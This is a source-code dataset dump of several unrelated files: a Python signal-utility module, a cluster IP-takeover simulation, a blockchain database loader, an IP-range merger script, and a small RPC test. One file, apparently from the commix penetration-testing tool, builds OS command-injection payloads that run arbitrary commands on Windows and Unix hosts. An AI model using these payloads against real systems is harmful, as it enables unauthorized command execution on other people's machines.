repo_name
stringlengths 5
100
| ref
stringlengths 12
67
| path
stringlengths 4
244
| copies
stringlengths 1
8
| content
stringlengths 0
1.05M
⌀ |
|---|---|---|---|---|
devs1991/test_edx_docmode
|
refs/heads/master
|
venv/lib/python2.7/site-packages/billiard/common.py
|
12
|
# -*- coding: utf-8 -*-
"""
This module contains utilities added by billiard, to keep
"non-core" functionality out of ``.util``."""
from __future__ import absolute_import
import os
import signal
import sys
import pickle as pypickle
try:
import cPickle as cpickle
except ImportError: # pragma: no cover
cpickle = None # noqa
from .exceptions import RestartFreqExceeded
from .five import monotonic
if sys.version_info < (2, 6): # pragma: no cover
# cPickle does not use absolute_imports
pickle = pypickle
pickle_load = pypickle.load
pickle_loads = pypickle.loads
else:
pickle = cpickle or pypickle
pickle_load = pickle.load
pickle_loads = pickle.loads
# cPickle.loads does not support buffer() objects,
# but we can just create a StringIO and use load.
if sys.version_info[0] == 3:
from io import BytesIO
else:
try:
from cStringIO import StringIO as BytesIO # noqa
except ImportError:
from StringIO import StringIO as BytesIO # noqa
EX_SOFTWARE = 70
TERMSIGS_DEFAULT = (
'SIGHUP',
'SIGQUIT',
'SIGTERM',
'SIGUSR1',
'SIGUSR2'
)
TERMSIGS_FULL = (
'SIGHUP',
'SIGQUIT',
'SIGTRAP',
'SIGABRT',
'SIGEMT',
'SIGSYS',
'SIGPIPE',
'SIGALRM',
'SIGTERM',
'SIGXCPU',
'SIGXFSZ',
'SIGVTALRM',
'SIGPROF',
'SIGUSR1',
'SIGUSR2',
)
#: set by signal handlers just before calling exit.
#: if this is true after the sighandler returns it means that something
#: went wrong while terminating the process, and :func:`os._exit`
#: must be called ASAP.
_should_have_exited = [False]
def pickle_loads(s, load=pickle_load):
# used to support buffer objects
return load(BytesIO(s))
def maybe_setsignal(signum, handler):
try:
signal.signal(signum, handler)
except (OSError, AttributeError, ValueError, RuntimeError):
pass
def _shutdown_cleanup(signum, frame):
# we will exit here so if the signal is received a second time
# we can be sure that something is very wrong and we may be in
# a crashing loop.
if _should_have_exited[0]:
os._exit(EX_SOFTWARE)
maybe_setsignal(signum, signal.SIG_DFL)
_should_have_exited[0] = True
sys.exit(-(256 - signum))
def reset_signals(handler=_shutdown_cleanup, full=False):
for sig in TERMSIGS_FULL if full else TERMSIGS_DEFAULT:
try:
signum = getattr(signal, sig)
except AttributeError:
pass
else:
current = signal.getsignal(signum)
if current is not None and current != signal.SIG_IGN:
maybe_setsignal(signum, handler)
class restart_state(object):
RestartFreqExceeded = RestartFreqExceeded
def __init__(self, maxR, maxT):
self.maxR, self.maxT = maxR, maxT
self.R, self.T = 0, None
def step(self, now=None):
now = monotonic() if now is None else now
R = self.R
if self.T and now - self.T >= self.maxT:
# maxT passed, reset counter and time passed.
self.T, self.R = now, 0
elif self.maxR and self.R >= self.maxR:
# verify that R has a value as the result handler
# resets this when a job is accepted. If a job is accepted
# the startup probably went fine (startup restart burst
# protection)
if self.R: # pragma: no cover
self.R = 0 # reset in case someone catches the error
raise self.RestartFreqExceeded("%r in %rs" % (R, self.maxT))
# first run sets T
if self.T is None:
self.T = now
self.R += 1
|
hackersql/sq1map
|
refs/heads/master
|
comm1x/src/core/injections/results_based/techniques/classic/cb_payloads.py
|
1
|
#!/usr/bin/env python
# encoding: UTF-8
"""
This file is part of Commix Project (http://commixproject.com).
Copyright (c) 2014-2017 Anastasios Stasinopoulos (@ancst).
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
For more see the file 'readme/COPYING' for copying permission.
"""
from src.utils import settings
"""
The classic injection technique on Classic OS Command Injection.
The available "classic" payloads.
"""
"""
Classic decision payload (check if host is vulnerable).
"""
def decision(separator, TAG, randv1, randv2):
if settings.TARGET_OS == "win":
if settings.SKIP_CALC:
payload = (separator +
"echo " + TAG + TAG + TAG + "< nul"
)
else:
payload = (separator +
"for /f \"tokens=*\" %i in ('cmd /c \"" +
"set /a (" + str(randv1) + "%2B" + str(randv2) + ")" +
"\"') do @set /p = " + TAG + "%i" + TAG + TAG + "< nul"
)
else:
if not settings.WAF_ENABLED:
if settings.USE_BACKTICKS:
math_calc = "`expr " + str(randv1) + " %2B " + str(randv2) + "`"
else:
math_calc = "$((" + str(randv1) + "%2B" + str(randv2) + "))"
else:
if settings.USE_BACKTICKS:
math_calc = "`expr " + str(randv1) + " %2B " + str(randv2) + "`"
else:
math_calc = "$(expr " + str(randv1) + " %2B " + str(randv2) + ")"
if settings.SKIP_CALC:
if settings.USE_BACKTICKS:
payload = (separator +
"echo " + TAG +
TAG + "" + TAG + ""
)
else:
payload = (separator +
"echo " + TAG +
"$(echo " + TAG + ")" + TAG + ""
)
else:
if settings.USE_BACKTICKS:
payload = (separator +
"echo " + TAG +
math_calc +
TAG + "" + TAG + ""
)
else:
payload = (separator +
"echo " + TAG +
math_calc +
"$(echo " + TAG + ")" + TAG + ""
)
return payload
"""
__Warning__: The alternative shells are still experimental.
"""
def decision_alter_shell(separator, TAG, randv1, randv2):
if settings.TARGET_OS == "win":
if settings.SKIP_CALC:
python_payload = settings.WIN_PYTHON_DIR + " -c \"print '" + TAG + "'%2B'" + TAG + "'%2B'" + TAG + "'\""
else:
python_payload = settings.WIN_PYTHON_DIR + " -c \"print '" + TAG + "'%2Bstr(int(" + str(int(randv1)) + "%2B" + str(int(randv2)) + "))" + "%2B'" + TAG + "'%2B'" + TAG + "'\""
payload = (separator +
"for /f \"tokens=*\" %i in ('cmd /c " +
python_payload +
"') do @set /p =%i< nul"
)
else:
if settings.SKIP_CALC:
payload = (separator +
"python -c \"print'" + TAG +
TAG +
TAG + "'\""
)
else:
payload = (separator +
"python -c \"print'" + TAG +
"'%2Bstr(int(" + str(int(randv1)) + "%2B" + str(int(randv2)) + "))" + "%2B'" +
TAG + "'%2B'" +
TAG + "'\""
)
return payload
"""
Execute shell commands on vulnerable host.
"""
def cmd_execution(separator, TAG, cmd):
if settings.TARGET_OS == "win":
if settings.REVERSE_TCP:
payload = (separator + cmd + " "
)
else:
payload = (separator +
"for /f \"tokens=*\" %i in ('cmd /c \"" +
cmd +
"\"') do @set /p = " + TAG + TAG + "%i" + TAG + TAG + "< nul"
)
else:
# if not settings.WAF_ENABLED:
# cmd_exec = "$(echo $(" + cmd + "))"
# else:
if settings.USE_BACKTICKS:
cmd_exec = "`" + cmd + "`"
payload = (separator +
"echo " + TAG +
"" + TAG + "" +
cmd_exec +
"" + TAG + "" + TAG + ""
)
else:
cmd_exec = "$(" + cmd + ")"
payload = (separator +
"echo " + TAG +
"$(echo " + TAG + ")" +
cmd_exec +
"$(echo " + TAG + ")" + TAG + ""
)
return payload
"""
__Warning__: The alternative shells are still experimental.
"""
def cmd_execution_alter_shell(separator, TAG, cmd):
if settings.TARGET_OS == "win":
if settings.REVERSE_TCP:
payload = (separator + cmd + " "
)
else:
payload = (separator +
"for /f \"tokens=*\" %i in ('" +
settings.WIN_PYTHON_DIR + " -c \"import os; os.system('powershell.exe -InputFormat none write-host " + TAG + TAG + " $(" + cmd + ") "+ TAG + TAG + "')\"" +
"') do @set /p =%i< nul"
)
else:
if settings.USE_BACKTICKS:
payload = (separator +
"python -c \"print'" + TAG + "'%2B'" + TAG + "'%2B'`" + cmd + "`" + TAG + "'%2B'" + TAG + "'\""
)
else:
payload = (separator +
"python -c \"print'" + TAG + "'%2B'" + TAG + "'%2B'$(" + cmd + ")'%2B'" + TAG + "'%2B'" + TAG + "'\""
)
return payload
#eof
|
jkstrick/samba
|
refs/heads/master
|
ctdb/tests/takeover/simulation/node_group_simple.py
|
31
|
#!/usr/bin/env python
# This example demonstrates a simple, sensible node group
# configuration. When run with deterministic IPs (use "-d" to show
# the problem) it does many gratuitous IP reassignments.
from ctdb_takeover import Cluster, Node, process_args
process_args()
addresses1 = ['A', 'B', 'C', 'D', 'E', 'F', 'G', 'H']
addresses2 = ['I', 'J', 'K']
c = Cluster()
for i in range(4):
c.add_node(Node(addresses1))
for i in range(3):
c.add_node(Node(addresses2))
c.add_node(Node([]))
c.recover()
c.random_iterations()
|
cryptocoinexplorer/Open-Source-CCE-4.0
|
refs/heads/master
|
dbload.py
|
1
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# dbload.py
#
# Copyright 2015 Hartland PC LLC
#
# This file is part of the of the database loader for CCE 4.0 (open source version).
#
# This package is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This package is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this package. If not, see <http://www.gnu.org/licenses/>.
import sys
import stats
from comm import *
from decimal import *
def startcheck(lockdir, recheckdir):
# Check to see if the loader is already running and set lock file
if os.access(os.path.expanduser(lockdir), os.F_OK):
pidfile = open(os.path.expanduser(lockdir), "r")
pidfile.seek(0)
old_pid = pidfile.readline()
if os.path.exists("/proc/%s" % old_pid):
sys.exit(0)
else:
os.remove(os.path.expanduser(lockdir))
pidfile = open(os.path.expanduser(lockdir), "w")
pidfile.write("%s" % os.getpid())
pidfile.close()
# Check for recheck file
ret = 'normal'
if os.access(os.path.expanduser(recheckdir), os.F_OK):
ret = 'recheck'
else:
checkfile = open(os.path.expanduser(recheckdir), "w")
checkfile.close()
return ret
# Error Logging
def loader_error_log(msg, function_name='No function name provided'):
currtime = time.strftime('%m-%d %H:%M:%S', time.gmtime())
logging.basicConfig(filename=str(os.getcwd() + "/loader.log"), level=logging.ERROR)
logging.error(currtime + ' ' + str(msg) + ' : ' + str(function_name))
# Address accounting. If credit is true, amount is added to address, else amount is subtracted.
# count_tx determines if the number of transactions on an account is incremented, decremented or unchanged.
def accounting(address, amount, credit, count_tx):
try:
ret = query_single('SELECT balance FROM address WHERE address = %s', address)
if ret is None:
ret = query_noreturn('INSERT INTO address (address,balance) VALUES(%s,%s)', address, amount)
conn.commit()
else:
if credit:
balance = Decimal(ret[0] + amount)
else:
balance = Decimal(ret[0] - amount)
if balance < 0:
balance = Decimal(0)
ret = query_noreturn('UPDATE address SET balance = %s WHERE address = %s', balance, address)
if count_tx == 'add':
ret = query_noreturn('UPDATE address SET n_tx = n_tx + 1 WHERE address = %s', address)
elif count_tx == 'subtract':
ret = query_noreturn('UPDATE address SET n_tx = abs(n_tx - 1) WHERE address = %s', address)
conn.commit()
except Exception as e:
loader_error_log(e, "Accounting loop error")
# Place data in table rows
def add_row(table, row_data):
cur = conn.cursor()
cur.execute("describe %s" % table)
allowed_keys = set(row[0] for row in cur.fetchall())
keys = allowed_keys.intersection(row_data)
columns = ", ".join(keys)
data_template = ", ".join(["%s"] * len(keys))
sql = "insert into %s (%s) values (%s)" % (table, columns, data_template)
data_tuple = tuple(row_data[key] for key in keys)
cur.execute(sql, data_tuple)
cur.close()
# Parse Transaction
def process_tx(tx_hash, blk_height):
rawtx = jsonrpc("getrawtransaction", tx_hash)
if rawtx['Status'] == 'error':
loader_error_log(rawtx['Data'], str('Raw tx on block:' + blk_height))
return rawtx
decode = jsonrpc("decoderawtransaction", rawtx['Data'])
if decode['Status'] == 'error':
loader_error_log(decode['Data'], str('Decode tx on block:' + blk_height))
return decode
jsn_decode = json.dumps(decode['Data'])
ret = query_noreturn('INSERT INTO tx_raw (tx_hash,raw,decoded,height) VALUES(%s,%s,%s,%s)', tx_hash, rawtx['Data'],
jsn_decode, blk_height)
total_out = Decimal(0)
# Transaction addresses are stored in tx_address to determine duplicate addresses in tx_in / tx_out.
# POS chains use the same address in both tx_in and tx_out for the generation transaction.
# If a duplicate address is found, the tx count for address will only be incremented once.
tx_address = []
for key in decode['Data']['vout']:
try:
key['address'] = key['scriptPubKey']['addresses'][0]
tx_address.append(key['address'])
# KeyError is not fatal, as generation transactions have no tx_in address
except KeyError:
key['address'] = "Unknown"
key['asm'] = key['scriptPubKey']['asm']
key['type'] = key['scriptPubKey']['type']
key['height'] = blk_height
key['tx_hash'] = tx_hash
key['raw'] = rawtx['Data']
key['value'] = Decimal(str(key['value']))
add_row('tx_out', key)
if key['address'] != 'Unknown':
accounting(key['address'], key['value'], True, 'add')
conn.commit()
total_out = Decimal(total_out + key['value'])
# If the transaction total out is larger then the lowest entry on the large tx table,
# replace the lowest transaction with this transaction
try:
low = query_single('SELECT * FROM large_tx ORDER BY amount ASC LIMIT 1')
if total_out > low[1]:
ret = query_noreturn('UPDATE large_tx SET tx = %s,amount = %s WHERE tx = %s', tx_hash, total_out,low[0])
# Exceptions in this block are non-fatal as the information value of the transaction itself far exceeds the value of large_tx
except:
pass
for key in decode['Data']['vin']:
try:
key['asm'] = key['scriptSig']['asm']
key['hex'] = key['scriptSig']['hex']
key['prev_out_hash'] = key['txid']
ret = query_single('SELECT * FROM tx_out WHERE tx_hash = %s AND n = %s', key['prev_out_hash'], key['vout'])
if not ret:
key['address'] = 'Not Available'
key['value_in'] = Decimal(total_out)
else:
count_tx = 'add'
key['address'] = str(ret[4])
key['value_in'] = ret[2]
if key['address'] in tx_address:
count_tx = 'no'
accounting(key['address'],key['value_in'],False,count_tx)
# Exceptions occur in this loop due to POW generation transactions.
# The value of tx_in and tx_out are always the same in these types of transactions
except Exception:
key['value_in'] = total_out
key['tx_hash'] = tx_hash
key['height'] = blk_height
add_row('tx_in', key)
return {'Status': 'ok', 'Data': {'out': total_out}}
# Parse block
def process_block(blk_height):
try:
if blk_height == -1:
raise Exception('Bad block height (-1)')
counter = 0
total_sent = Decimal(0)
b_hash = jsonrpc("getblockhash", blk_height)['Data']
block = jsonrpc("getblock", b_hash)['Data']
# In POS chains, nonce is used to determine if a block is POS.
# The 'flags' field in the daemon output is unreliable due to different verbiage and multiple flags.
# Merged mine chains also use 0 in the nonce field. This system will not work with POS merged mined chains.
# POS merged mined compatibility will be added in the future
if CONFIG["chain"]["pos"] == 'true' and block['nonce'] == 0:
counter = 1
for key in block['tx']:
if counter == 1:
counter = 2
elif counter == 2:
block['pos'] = key
counter = 0
prostx = process_tx(key, blk_height)
if prostx['Status'] == 'error':
raise Exception(prostx['Data'])
total_sent = Decimal(total_sent + prostx['Data']['out'])
block['raw'] = json.dumps(block, sort_keys=False, indent=1)
add_row('block', block)
conn.commit()
ret = query_noreturn('UPDATE block SET total_sent = %s, n_tx = %s WHERE height = %s',
total_sent, len(block['tx']), blk_height)
conn.commit()
except Exception as e:
return {'Status':'error','Data':e}
return {'Status':'ok'}
# Orphan correction. Copy to orphan tables,delete block/tx information, and re-parse block.
# If recheck is true, block/tx information is not copied to orphan tables.
def orphan(blk_height, recheck=False):
try:
if not recheck:
loader_error_log("Orphan routine called", blk_height)
ret = query_noreturn('INSERT INTO orph_block SELECT * FROM block WHERE height = %s', blk_height)
ret = query_noreturn('INSERT INTO orph_tx_raw SELECT * FROM tx_raw WHERE height = %s', blk_height)
ret = query_noreturn('DELETE FROM block WHERE height = %s', blk_height)
ret = query_noreturn('DELETE FROM tx_raw WHERE height = %s', blk_height)
txin = query_multi('SELECT * FROM tx_in WHERE height = %s', blk_height)
for key in txin:
if key[7] != '0':
accounting(str(key[7]),key[6], True,'subtract')
txout = query_multi('SELECT * FROM tx_out WHERE height = %s', blk_height)
for key in txout:
accounting(str(key[4]),key[2], False,'subtract')
if not recheck:
ret = query_noreturn('INSERT INTO orph_tx_in SELECT * FROM tx_in WHERE height = %s', blk_height)
ret = query_noreturn('INSERT INTO orph_tx_out SELECT * FROM tx_out WHERE height = %s', blk_height)
ret = query_noreturn('INSERT INTO orph_tx_raw SELECT * FROM tx_raw WHERE height = %s', blk_height)
ret = query_noreturn('DELETE FROM tx_in WHERE height = %s', blk_height)
ret = query_noreturn('DELETE FROM tx_out WHERE height = %s', blk_height)
ret = query_noreturn('DELETE FROM tx_raw WHERE height = %s', blk_height)
ret = process_block(blk_height)
if ret['status'] == 'error':
raise Exception(ret['Data'])
conn.commit()
except Exception as e:
loader_error_log(e, "Orphan loop error")
conn.rollback()
if not recheck:
loader_error_log('Successful orphan recovery: ', str(blk_height))
def main(argv):
lockdir = str(os.getcwd() + "/" + "dataload.lock")
recheckdir = str(os.getcwd() + "/" + "recheck")
startmode = startcheck(lockdir, recheckdir)
verbose = False
# Set cowtime (loader timeout) to 5 minutes
cowtime = 60 * 5
try:
for opt in argv:
# Set new database mode and cowtime to 24 hours if -n flag
if opt == '-n':
startmode = 'newdb'
cowtime = 60 * 60 * 24
# Run recheck if -r flag
elif opt == '-r' and startmode != 'newdb':
startmode = 'recheck'
# Send verbose messages to stderr if -v flag
elif opt == '-v':
verbose = True
# Set cowtime to 24 hours if -l flag
elif opt == '-l':
cowtime = 60 * 60 * 24
except:
pass
try:
with timeout(cowtime, exception=Exception('DBLoader Timeout')):
# Get block heights
daemon = jsonrpc("getblockcount")
if daemon['Status'] != 'error':
top_height = daemon['Data']
blk_height = query_single('SELECT height FROM block ORDER BY height DESC LIMIT 1')
if not blk_height:
blk_height = 1
else:
blk_height = int(blk_height[0] + 1)
else:
loader_error_log(daemon['Data'], 'Get Block Height')
raise Exception(daemon['Data'])
# Sleep is needed to allow the daemon time to catch orphans
if startmode != 'newdb':
time.sleep(15)
# Recheck mode, re-parse the last 5 blocks in the database
if startmode == 'recheck' and blk_height > 5:
if verbose:
print >> sys.stderr, "Recheck Called"
for blk in range(blk_height - 5, blk_height):
orphan(blk, True)
# Check last (blockcheck) blocks for orphans and fix if needed
blockcheck = int(CONFIG["loader"]["blockcheck"])
if blk_height > blockcheck:
for blk in range(blk_height - blockcheck, blk_height):
d_hash = jsonrpc('getblockhash', blk)
db_hash = query_single('SELECT hash FROM block where height = %s', blk)[0]
if d_hash['Data'] != db_hash:
orphan(blk)
# Genesis block TX needs to be entered manually. Process block information only
if startmode == 'newdb':
b_hash = jsonrpc("getblockhash", 0)['Data']
block = jsonrpc("getblock", b_hash)['Data']
block['raw'] = json.dumps(block, sort_keys=False, indent=1)
add_row('block', block)
# Set up top_address table
for i in range(int(CONFIG['stat']['richlistlen'])):
ret = query_noreturn('INSERT INTO top_address (rank) VALUES(%s)', i + 1)
# Set up stats table
ret = query_noreturn('INSERT INTO stats (peer_txt) VALUES("None")')
blk_height = 1
# Process blocks loop
while blk_height <= top_height:
ret = process_block(blk_height)
if ret['Status'] == 'error':
raise Exception(ret['Data'])
if startmode == 'newdb' and blk_height == 101:
ret = query_noreturn('TRUNCATE large_tx')
time.sleep(5)
ret = query_noreturn('INSERT INTO large_tx SELECT tx_hash,SUM(value) FROM tx_out GROUP BY tx_hash ORDER BY SUM(value) DESC LIMIT 100')
blk_height += 1
if verbose:
print >> sys.stderr, 'Processing Block: ', blk_height, ' of ', top_height, '\r',
# Call Statistics module
if CONFIG['loader']['stats'] == 'true':
if verbose:
print >> sys.stderr, '\nCalling Statistics Module'
stats.main()
except Exception as e:
loader_error_log(str(e), 'Main loop')
conn.close()
os.remove(os.path.expanduser(lockdir))
if verbose:
print >> sys.stderr, '\nMain Loop', str(e)
sys.exit(0)
# Clean up
conn.close()
if verbose:
print >> sys.stderr, "Database load complete"
os.remove(os.path.expanduser(recheckdir))
os.remove(os.path.expanduser(lockdir))
if __name__ == '__main__':
main(sys.argv[1:])
|
lichuan261/wuand
|
refs/heads/master
|
XX-Net/goagent/3.1.49/local/generate_ip_range.py
|
1
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import ip_utils
__author__ = 'moonshawdo@gamil.com'
# read ip range string
# order it
# merge over lapped
# Then reproduce good format file
# check it.
import re
ip_str_list = '''
1.179.248.0-1.179.248.255
4.3.2.0/24
8.6.48.0-8.6.55.255
8.8.4.0/24
8.8.8.0/24
8.22.56.0-8.22.63.255
8.34.208.0-8.34.223.255
8.35.192.0-8.35.207.255
12.216.80.0-12.216.80.255
24.156.131.0-24.156.131.255
41.206.96.0-41.206.96.255
60.199.175.18-60.199.175.187
61.19.1.30-61.19.1.109
61.219.131.84-61.219.131.251
62.116.207.0-62.116.207.63
62.197.198.193-62.197.198.251
63.211.200.72-63.211.200.79
64.15.112.0-64.15.117.255
64.15.119.0-64.15.126.255
64.18.0.0-64.18.15.255
64.41.221.192-64.41.221.207
64.68.64.64-64.68.64.127
64.68.80.0-64.68.95.255
64.154.178.208-64.154.178.223
64.233.160.0-64.233.191.255
66.102.0.0-66.102.15.255
66.249.64.0-66.249.95.255
70.32.128.0-70.32.159.255
70.90.219.48-70.90.219.55
70.90.219.72-70.90.219.79
72.14.192.0-72.14.255.255
74.125.0.0-74.125.255.255
78.37.100.0/24
80.64.175.0/24
80.228.65.128-80.228.65.191
81.175.29.128-81.175.29.191
84.235.77.0-84.235.77.255
85.182.250.0-85.182.250.255
86.127.118.128-86.127.118.191
93.94.217.0-93.94.217.31
93.94.218.0-93.94.218.31
93.183.211.192-93.183.211.255
94.40.70.0-94.40.70.63
94.200.103.64-94.200.103.71
95.54.196.0/24
106.162.192.148-106.162.192.187
106.162.198.84-106.162.198.123
106.162.216.20-106.162.216.123
108.59.80.0-108.59.95.255
108.170.192.0-108.170.255.255
108.177.0.0-108.177.127.255
111.168.255.20-111.168.255.187
113.197.105.0-113.197.105.255
114.4.41.0/24
118.174.24.0-118.174.27.255
121.78.74.68-121.78.74.123
123.205.250.0-123.205.250.255
123.205.251.68-123.205.251.123
139.175.107.88/24
142.250.0.0-142.251.255.255
162.216.148.0-162.216.151.255
166.90.148.64-166.90.148.79
172.217.0.0-172.217.255.255
172.253.0.0-172.253.255.255
173.194.0.0-173.194.255.255
178.45.251.84-178.45.251.123
178.60.128.1-178.60.128.
192.158.28.0-192.158.31.255
192.178.0.0-192.179.255.255
193.92.133.0-193.92.133.63
193.120.166.64-193.120.166.127
194.78.99.0-194.78.99.255
194.221.68.0-194.221.68.255
195.249.20.192-195.249.20.255
198.108.100.192-198.108.100.207
199.87.241.32-199.87.241.63
199.192.112.0-199.192.115.255
199.223.232.0-199.223.239.255
202.39.143.1-202.39.143.123
202.169.193.0/24
203.66.124.129-203.66.124.251
203.116.165.148-203.116.165.251
203.117.34.148-203.117.34.187
203.165.13.210-203.165.13.251
203.165.14.210-203.165.14.251
203.208.32.0-203.208.63.255
203.211.0.20-203.211.0.59
207.126.144.0-207.126.159.255
207.223.160.0-207.223.175.255
208.21.209.0-208.21.209.15
208.117.224.0-208.117.239.55
208.117.233.0/24
208.117.240.0-208.117.255.255
209.85.128.0-209.85.255.255
209.185.108.128-209.185.108.255
209.245.184.136-209.245.184.143
209.247.159.144-209.247.159.159
210.61.221.148-210.61.221.187
210.139.253.20-210.139.253.251
210.153.73.20-210.153.73.123
213.158.11.0/24
210.158.146.0/24
210.242.125.20-210.242.125.59
210.245.14.0/24
212.188.15.0-212.188.15.255
213.186.229.0-213.186.229.63
213.240.44.0-213.240.44.31
216.33.229.0/24
216.58.208.0/20
216.109.75.80-216.109.75.95
216.239.32.0-216.239.63.255
218.176.242.0-218.176.242.255
218.253.0.0/24
1.179.248-255.0-255
103.246.187.0-255
103.25.178.4-59
106.162.192.148-187
106.162.198.84-123
106.162.216.20-123
107.167.160-191.0-255
107.178.192-255.0-255
107.188.128-255.0-255
108.170.192-255.0-255
108.177.0-127.0-255
108.59.80-95.0-255
109.232.83.64-127
111.168.255.20-187
111.92.162.4-59
113.197.105-106.0-255
118.174.24-27.0-255
12.216.80.0-255
121.78.74.68-123
123.205.250-251.68-190
130.211.0-255.0-255
142.250-251.0-255.0-255
146.148.0-127.0-255
149.126.86.1-59
149.3.177.0-255
162.216.148-151.0-255
162.222.176-183.0-255
163.28.116.1-59
163.28.83.143-187
172.217.0-255.0-255
172.253.0-255.0-255
173.194.0-255.0-255
173.255.112-127.0-255
178.45.251.4-123
178.60.128.1-63
185.25.28-29.0-255
192.119.16-31.0-255
192.158.28-31.0-255
192.178-179.0-255.0-255
192.200.224-255.0-255
193.120.166.64-127
193.134.255.0-255
193.142.125.0-255
193.186.4.0-255
193.192.226.128-191
193.192.250.128-191
193.200.222.0-255
193.247.193.0-255
193.90.147.0-123
193.92.133.0-63
194.100.132.128-143
194.110.194.0-255
194.78.20.16-31
194.78.99.0-255
195.100.224.112-127
195.141.3.24-27
195.205.170.64-79
195.229.194.88-95
195.244.106.0-255
195.244.120.144-159
195.249.20.192-255
195.65.133.128-135
195.76.16.136-143
195.81.83.176-207
196.3.58-59.0-255
197.199.253-254.1-59
197.84.128.0-63
199.192.112-115.0-255
199.223.232-239.0-255
202.39.143.1-123
203.116.165.129-255
203.117.34-37.132-187
203.165.13-14.210-251
203.211.0.4-59
203.66.124.129-251
207.223.160-175.0-255
208.117.224-255.0-255
208.65.152-155.0-255
209.85.128-255.0-255
210.139.253.20-251
210.153.73.20-123
210.242.125.20-59
210.61.221.65-187
212.154.168.224-255
212.162.51.64-127
212.181.117.144-159
212.188.10.0-255
212.188.15.0-255
212.188.7.0-255
213.186.229.0-63
213.187.184.68-71
213.240.44.0-31
213.252.15.0-31
213.31.219.80-87
216.21.160-175.0-255
216.239.32-63.0-255
216.58.192-223.0-255
217.149.45.16-31
217.163.7.0-255
217.193.96.38
217.28.250.44-47
217.28.253.32-33
217.30.152.192-223
217.33.127.208-223
218.176.242.4-251
218.189.25.129-187
218.253.0.76-187
23.228.128-191.0-255
23.236.48-63.0-255
23.251.128-159.0-255
23.255.128-255.0-255
24.156.131.0-255
31.209.137.0-255
31.7.160.192-255
37.228.69.0-63
41.206.96.1-251
41.84.159.12-30
60.199.175.1-187
61.219.131.65-251
62.0.54.64-127
62.1.38.64-191
62.116.207.0-63
62.197.198.193-251
62.20.124.48-63
62.201.216.196-251
63.243.168.0-255
64.15.112-127.0-255
64.233.160-191.0-255
64.9.224-255.0-255
66.102.0-15.0-255
66.185.84.0-255
66.249.64-95.0-255
69.17.141.0-255
70.32.128-159.0-255
72.14.192-255.0-255
74.125.0-255.0-255
77.109.131.208-223
77.40.222.224-231
77.42.248-255.0-255
77.66.9.64-123
78.8.8.176-191
8.15.202.0-255
8.22.56.0-255
8.34.208-223.0-255
8.35.192-207.0-255
8.6.48-55.0-255
8.8.4.0-255
8.8.8.0-255
80.227.152.32-39
80.228.65.128-191
80.231.69.0-63
80.239.168.192-255
80.80.3.176-191
81.175.29.128-191
81.93.175.232-239
82.135.118.0-63
83.100.221.224-255
83.141.89.124-127
83.145.196.128-191
83.220.157.100-103
83.94.121.128-255
84.233.219.144-159
84.235.77.1-251
85.182.250.0-191
86.127.118.128-191
87.244.198.160-191
88.159.13.192-255
89.207.224-231.0-255
89.96.249.160-175
92.45.86.16-31
93.123.23.1-59
93.183.211.192-255
93.94.217-218.0-31
94.200.103.64-71
94.40.70.0-63
95.143.84.128-191
61.19.1-2.0-127
61.19.8.0-127
113.21.24.0-127
118.143.88.16-123
202.86.162.20-187
139.175.107.20-187
223.26.69.16-59
220.255.5-6.20-251
202.65.246.84-123
103.1.139.148-251
116.92.194.148-187
58.145.238.20-59
41.201.128.20-59
41.201.164.20-59
222.255.120.15-59
119.81.145.120-127
119.81.142.202
23.239.5.106
74.207.242.141
'''
def PRINT(strlog):
print (strlog)
def merge_ip_range():
ip_range_list = []
ip_lines_list = re.split("\r|\n", ip_str_list)
for iplines in ip_lines_list:
if len(iplines) == 0 or iplines[0] == '#':
#print "non:", iplines
continue
ips = re.split(",|\|", iplines)
for line in ips:
if len(line) == 0 or line[0] == '#':
#print "non line:", line
continue
begin, end = ip_utils.split_ip(line)
if ip_utils.check_ip_valid(begin) == 0 or ip_utils.check_ip_valid(end) == 0:
PRINT("ip format is error,line:%s, begin: %s,end: %s" % (line, begin, end))
continue
nbegin = ip_utils.ip_string_to_num(begin)
nend = ip_utils.ip_string_to_num(end)
ip_range_list.append([nbegin,nend])
#print begin, end
ip_range_list.sort()
# merge range
ip_range_list_2 = []
range_num = len(ip_range_list)
last_begin = ip_range_list[0][0]
last_end = ip_range_list[0][1]
for i in range(1,range_num - 1):
ip_range = ip_range_list[i]
begin = ip_range[0]
end = ip_range[1]
#print "now:",ip_utils.ip_num_to_string(begin), ip_utils.ip_num_to_string(end)
if begin > last_end + 2:
#print "add:",ip_utils.ip_num_to_string(begin), ip_utils.ip_num_to_string(end)
ip_range_list_2.append([last_begin, last_end])
last_begin = begin
last_end = end
else:
print "merge:", ip_utils.ip_num_to_string(last_begin), ip_utils.ip_num_to_string(last_end), ip_utils.ip_num_to_string(begin), ip_utils.ip_num_to_string(end)
if end > last_end:
last_end = end
ip_range_list_2.append([last_begin, last_end])
for ip_range in ip_range_list_2:
begin = ip_range[0]
end = ip_range[1]
print ip_utils.ip_num_to_string(begin), ip_utils.ip_num_to_string(end)
# write out
fd = open("ip_range.txt", "w")
for ip_range in ip_range_list_2:
begin = ip_range[0]
end = ip_range[1]
#print ip_utils.ip_num_to_string(begin), ip_utils.ip_num_to_string(end)
fd.write(ip_utils.ip_num_to_string(begin)+ "-" + ip_utils.ip_num_to_string(end)+"\n")
fd.close()
merge_ip_range()
def test_load():
fd = open("ip_range.txt", "r")
if not fd:
print "open ip_range.txt fail."
exit()
amount = 0
for line in fd.readlines():
if len(line) == 0 or line[0] == '#':
continue
begin, end = ip_utils.split_ip(line)
nbegin = ip_utils.ip_string_to_num(begin)
nend = ip_utils.ip_string_to_num(end)
num = nend - nbegin
amount += num
print ip_utils.ip_num_to_string(nbegin), ip_utils.ip_num_to_string(nend), num
fd.close()
print "amount:", amount
#
test_load()
|
ConsenSys/eth-testrpc
|
refs/heads/master
|
tests/client/test_get_block_by_number.py
|
3
|
def test_get_block_with_no_transactions(client, hex_accounts):
client.wait_for_block(1)
block = client.get_block_by_number(1)
assert block['number'] == b"0x1"
assert block['miner'] == hex_accounts[0]
